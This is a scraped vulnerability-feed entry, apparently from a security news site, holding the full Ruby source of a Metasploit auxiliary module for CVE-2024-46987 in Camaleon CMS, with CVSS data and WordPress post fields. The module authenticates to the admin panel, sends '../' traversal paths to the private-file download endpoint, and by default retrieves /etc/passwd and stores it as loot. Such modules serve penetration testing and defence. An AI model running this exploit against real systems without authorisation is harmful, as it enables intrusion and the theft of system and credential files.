{“lastseen”:”2026-04-17T19:28:03″,”description”:”Exploits CVE-2024-46987, an authenticated directory traversal vulnerability in Camaleon CMS versions use auxiliary\/gather\/camaleondownloadprivatefile msf auxiliarycamaleondownloadprivatefile show actions …actions… msf…”,”published”:”2026-04-17T19:01:35″,”modified”:”2026-04-17T19:01:35″,”type”:”metasploit”,”title”:”Camaleon CMS Directory Traversal CVE-2024-46987″,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-46987″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Auxiliary::Report\\n include Msf::Exploit::Remote::HttpClient\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Camaleon CMS Directory Traversal CVE-2024-46987’,\\n ‘Description’ =\\u003e %q{\\n Exploits CVE-2024-46987, an authenticated directory traversal\\n vulnerability in Camaleon CMS versions \\u003c= 2.8.0 and 2.9.0\\n },\\n ‘Author’ =\\u003e [\\n ‘Peter Stockli’, # Vulnerability Disclosure\\n ‘Goultarde’, # Python Script\\n ‘bootstrapbool’, # Metasploit Module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Privileged’ =\\u003e true,\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2024-46987’],\\n [\\n ‘URL’, # Advisory\\n ‘https:\/\/securitylab.github.com\/advisories\/GHSL-2024-182_GHSL-2024-186_Camaleon_CMS\/’\\n ],\\n [\\n ‘URL’, # Python Script\\n ‘https:\/\/github.com\/Goultarde\/CVE-2024-46987’\\n ],\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2024-08-08’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n register_options(\\n [\\n OptString.new(‘USERNAME’, [true, ‘Valid username’, ‘admin’]),\\n OptString.new(‘PASSWORD’, [true, ‘Valid password’, ‘admin123’]),\\n OptString.new(‘FILEPATH’, [true, ‘The path to the file to read’, ‘\/etc\/passwd’]),\\n OptString.new(‘TARGETURI’, [false, ‘The Camaleon CMS base path’]),\\n OptInt.new(‘DEPTH’, [ true, ‘Depth for Path Traversal’, 13 ]),\\n OptBool.new(‘STORE_LOOT’, [false, ‘Store the target file as loot’, true])\\n ]\\n )\\n end\\n\\n def build_traversal_path(filepath, depth)\\n if depth == 0\\n return filepath\\n end\\n\\n # Remove C:\\\\ prefix if present (path traversal doesn’t work with drive letters)\\n normalized_path = filepath.gsub(\/^[A-Z]:\\\\\\\\\/, ”).gsub(\/^[A-Z]:\/, ”)\\n\\n traversal = ‘..\/’ * depth\\n\\n if normalized_path[0] == ‘\/’\\n return \\”#{traversal[0..-2]}#{normalized_path}\\”\\n end\\n\\n \\”#{traversal}#{normalized_path}\\”\\n end\\n\\n def get_token(login_uri)\\n res = send_request_cgi({ ‘uri’ =\\u003e login_uri, ‘keep_cookies’ =\\u003e true })\\n\\n return nil unless res \\u0026\\u0026 res.code == 200\\n\\n match = res.body.match(\/name=\\”authenticity_token\\” value=\\”([^\\”]+)\\”\/)\\n\\n return match ? match[1] : nil\\n end\\n\\n def authenticate(username, password)\\n login_uri = normalize_uri(target_uri.path, ‘admin\/login’)\\n\\n vprint_status(\\”Retrieving token from #{login_uri}\\”)\\n\\n token = get_token(login_uri)\\n\\n if token.nil? || cookie_jar.empty?\\n fail_with(Failure::UnexpectedReply, ‘Failed to retrieve token’)\\n end\\n\\n vprint_status(\\”Retrieved token #{token}\\”)\\n vprint_status(\\”Authenticating to #{login_uri}\\”)\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e login_uri,\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_post’ =\\u003e {\\n ‘authenticity_token’ =\\u003e token,\\n ‘user[username]’ =\\u003e username,\\n ‘user[password]’ =\\u003e password\\n }\\n })\\n\\n unless res \\u0026\\u0026 res.code == 302\\n fail_with(Failure::NoAccess, ‘Authentication failed’)\\n end\\n\\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘admin\/dashboard’)\\n )\\n\\n if res.body.downcase.include?(‘logout’)\\n vprint_status(‘Authentication succeeded’)\\n return\\n end\\n\\n fail_with(Failure::NoAccess, ‘Authentication failed’)\\n end\\n\\n def get_version\\n vprint_status(‘Attempting to get build number’)\\n\\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘admin\/dashboard’)\\n )\\n\\n return nil unless res \\u0026\\u0026 res.code == 200\\n\\n html = res.get_html_document\\n\\n version_div = html.css(‘div.pull-right’).find do |div|\\n div.at_css(‘b’) \\u0026\\u0026 div.at_css(‘b’).text.strip == ‘Version’\\n end\\n\\n if version_div\\n match = version_div.text.strip.match(\/Version\\\\s*(\\\\S+)\/)\\n return match[1] if match\\n end\\n end\\n\\n def vuln_version?(version)\\n print_status(\\”Detected build version is #{version}\\”)\\n\\n if version == ‘2.9.0’ || Rex::Version.new(version) \\u003c Rex::Version.new(‘2.8.1’)\\n print_status(‘Version is vulnerable’)\\n return true\\n end\\n\\n print_warning(‘Version is not vulnerable’)\\n false\\n end\\n\\n def get_file(filepath)\\n filepath = build_traversal_path(filepath, datastore[‘DEPTH’])\\n\\n lfi_uri = normalize_uri(\\n target_uri.path,\\n ‘admin\/media\/download_private_file’\\n )\\n\\n vprint_status(\\”Attempting to retrieve file #{filepath} from #{lfi_uri}\\”)\\n\\n res = send_request_cgi({\\n ‘uri’ =\\u003e lfi_uri,\\n ‘vars_get’ =\\u003e {\\n ‘file’ =\\u003e filepath\\n },\\n ‘encode_params’ =\\u003e false\\n })\\n\\n if res\\n if res.code == 404\\n return nil\\n end\\n\\n if res.body.downcase.include?(‘invalid file’)\\n return nil\\n end\\n\\n vprint_good(‘Successfully retrieved file’)\\n return res.body\\n end\\n end\\n\\n def run\\n cookie_jar.clear\\n\\n authenticate(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n\\n res = get_file(datastore[‘FILEPATH’])\\n\\n if res.nil? || res == false || !res.is_a?(String)\\n fail_with(Failure::PayloadFailed, ‘Failed to obtain file’)\\n end\\n\\n if datastore[‘STORE_LOOT’]\\n path = store_loot(\\n ‘camaleon.traversal’,\\n ‘text\/plain’,\\n datastore[‘RHOST’],\\n res,\\n datastore[‘FILEPATH’]\\n )\\n print_good(\\”#{datastore[‘FILEPATH’]} stored as ‘#{path}’\\”)\\n end\\n\\n print_line\\n print_line(res)\\n end\\n\\n def check\\n cookie_jar.clear\\n\\n authenticate(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n\\n version = get_version\\n\\n if version.nil?\\n return Exploit::CheckCode::Unknown(‘Failed to get build version’)\\n elsif vuln_version?(version) != true\\n return Exploit::CheckCode::Safe\\n end\\n\\n res = get_file(datastore[‘FILEPATH’])\\n\\n if res.nil? || res == false || !res.is_a?(String)\\n print_error(‘Failed to obtain file’)\\n return Exploit::CheckCode::Appears\\n end\\n\\n Exploit::CheckCode::Vulnerable\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/camaleon_download_private_file.rb”,”cvss”:{“score”:7.7,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/camaleon_download_private_file\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-17T19:28:03″,”description”:”Exploits CVE-2024-46987, an authenticated directory traversal vulnerability in Camaleon CMS versions use auxiliary\/gather\/camaleondownloadprivatefile msf auxiliarycamaleondownloadprivatefile show actions …actions… msf…”,”published”:”2026-04-17T19:01:35″,”modified”:”2026-04-17T19:01:35″,”type”:”metasploit”,”title”:”Camaleon CMS Directory Traversal CVE-2024-46987″,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-46987″],”sourceData”:”##\\n# This module…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,87,12,15,169,13,7,11,5],"class_list":["post-47702","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-77","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n